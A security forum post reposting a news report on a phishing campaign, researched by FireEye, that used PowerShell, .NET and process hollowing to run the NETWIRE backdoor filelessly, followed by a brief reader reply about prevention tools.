Level 52
Content Creator
Malware Hunter
Phishing campaign attacker targets multiple customers and successfully executes payload without having to write the executable dropper or the payload to the disk by using process hollowing.

Security researchers have discovered a recent phishing campaign where an attacker targeted multiple customers and successfully executed their payload without having to write the executable dropper or the payload to the disk.

According to blog post by researchers at Fireeye, the campaign kicked off in February this year and involved the use of VBScript, PowerShell and the .NET framework to perform a code injection attack using a process hollowing technique.

"The attacker abused the functionality of loading .NET assembly directly into memory of PowerShell to execute malicious code without creating any PE files on the disk," said researchers.

According to researchers the malware prompts the victim to open a document stored on Google Drive. It is thought that the hackers are targeting members of the airline industry that use a particular aircraft model. They added that there has been an increasing number of attackers relying on cloud-based file storage services that bypass firewall restrictions to host their payload.

Researchers said that when executed, after multiple levels of obfuscation, a PowerShell script is executed that loads a .NET assembly from a remote URL, functions of which are then used to inject the final payload (NETWIRE Trojan) into a benign Microsoft executable using process hollowing.

"This can potentially bypass application whitelisting since all processes spawned during the attack are legitimate Microsoft executables," said researchers.

The final payload in the attack was identified as a Netwire backdoor. Its capabilities include key logging, reverse shell, and password theft. The backdoor uses a custom encryption algorithm to encrypt data and then writes it to a file created in the ./LOGS directory. The malware also contains a custom obfuscation algorithm to hide registry keys, APIs, DLL names, and other strings from static analysis.

"Malware authors continue to use different "fileless" process execution techniques to reduce the number of indicators on an endpoint. The lack of visibility into .NET process execution combined with the flexibility of PowerShell makes this technique all the more effective," said researchers.


Level 3
Great article. Maybe this can be prevented by using, for example, Hitman Pro Alert with OS Armor?